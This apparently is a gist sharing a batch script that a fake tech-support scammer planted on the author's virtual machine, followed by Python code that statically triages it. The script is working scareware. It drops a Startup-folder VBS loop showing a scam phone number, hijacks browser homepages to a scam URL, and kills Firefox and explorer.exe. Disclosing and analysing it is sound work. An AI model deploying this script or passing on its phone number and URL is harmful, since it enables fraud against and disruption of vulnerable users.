Created August 9, 2017 04:16
Windows batch script uploaded remotely to my Windows 7 virtual machine by fake "Microsoft" support scammer.
@echo off
rem Navigate to startup folder
cd "%userprofile%\Start Menu\Programs\Startup"
echo DO >> "startup1.vbs"
echo MSGBOX "WINDOWS HAS BEEN CRASHED, CALL WINDOWS SUPPORT 844-666-0661 FOR HELP " >> "startup1.vbs"
echo LOOP >> "startup1.vbs"
@echo off
echo cd "C:\Windows\System32" > "startup1.bat"
rem Navigate to startup folder
cd "%userprofile%\Start Menu\Programs\Startup"
echo @echo off >> "startup1.bat"
echo Go to Begin >> "startup1.bat"
echo @echo off >> "startup1.bat"
echo REG ADD "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN" /V "START PAGE" /D "http://wetech365.com/popup.jpg" /F >> "startup1.bat"
echo @echo off >> "startup1.bat"
echo REG ADD "HKCU\SOFTWARE\MICROSOFT\GOOGLE CHROME\MAIN" /V "START PAGE" /D "http://wetech365.com/popup.jpg" /F >> "startup1.bat"
echo @echo off >> "startup1.bat"
echo REG ADD "HKCU\SOFTWARE\MICROSOFT\MOZILLA FIREFOX\MAIN" /V "START PAGE" /D "http://wetech365.com/popup.jpg" /F >> "startup1.bat"
echo taskkill /im firefox.exe* /f >> "startup1.bat"
echo cd /D "%APPDATA%\Mozilla\Firefox\Profiles" >> "startup1.bat"
echo cd *.default >> "startup1.bat"
echo set ffile=%cd% >> "startup1.bat"
echo echo user_pref("browser.startup.homepage", "http://wetech365.com/popup.jpg");>>"%ffile%\prefs.js" >> "startup1.bat"
echo set ffile= >> "startup1.bat"
echo cd %windir% >> "startup1.bat"
echo javascript:(function(){ window.location.href='http://wetech365.com/popup.jpg';})(); >> "startup1.bat"
echo taskkill /f /IM explorer.exe >> "startup2.bat"
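
Added example, not part of the gist: a static triage pass that reconstructs, without running the script, which files its `echo ... >` / `>>` lines would drop and which URLs those files embed. It assumes relative redirect targets, does not expand `%variables%`, and treats the last redirection on a line as the target; `reconstruct` and `triage` are names made up for this example.

```python
import re

# Excerpt of the dropper above, embedded as data; it is parsed, never executed.
SAMPLE = r'''
cd "%userprofile%\Start Menu\Programs\Startup"
echo DO >> "startup1.vbs"
echo MSGBOX "WINDOWS HAS BEEN CRASHED, CALL WINDOWS SUPPORT 844-666-0661 FOR HELP " >> "startup1.vbs"
echo LOOP >> "startup1.vbs"
echo cd "C:\Windows\System32" > "startup1.bat"
echo REG ADD "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN" /V "START PAGE" /D "http://wetech365.com/popup.jpg" /F >> "startup1.bat"
echo taskkill /f /IM explorer.exe >> "startup2.bat"
'''

# "echo <text> > file" or ">> file"; assumption: the final redirection is the target.
ECHO_RE = re.compile(r'^\s*@?echo\s(?P<text>.*?)\s?(?P<op>>>?)\s*"?(?P<file>[^">]+?)"?\s*$', re.I)
CD_RE = re.compile(r'^\s*cd\s+(?:/d\s+)?"?(?P<dir>[^"]+?)"?\s*$', re.I)
URL_RE = re.compile(r'https?://[^\s"\']+', re.I)

def reconstruct(script):
    """Return {path: [lines]} for every file the script would write via echo redirection."""
    cwd, files = "", {}
    for line in script.splitlines():
        m = CD_RE.match(line)
        if m:                          # track the working directory the writes land in
            cwd = m.group("dir")
            continue
        m = ECHO_RE.match(line)
        if not m:                      # "@echo off", rem, and other non-writing lines
            continue
        path = cwd + "\\" + m.group("file") if cwd else m.group("file")
        if m.group("op") == ">":       # a single ">" truncates the target first
            files[path] = []
        files.setdefault(path, []).append(m.group("text"))
    return files

def triage(files):
    """Flag writes into a Startup folder and collect URLs embedded in dropped content."""
    startup = sorted(p for p in files if "programs\\startup" in p.lower())
    urls = sorted({u for lines in files.values() for l in lines for u in URL_RE.findall(l)})
    return {"startup_files": startup, "urls": urls}

if __name__ == "__main__":
    dropped = reconstruct(SAMPLE)
    for path, lines in dropped.items():
        print(path, "->", len(lines), "line(s)")
    print(triage(dropped))
```
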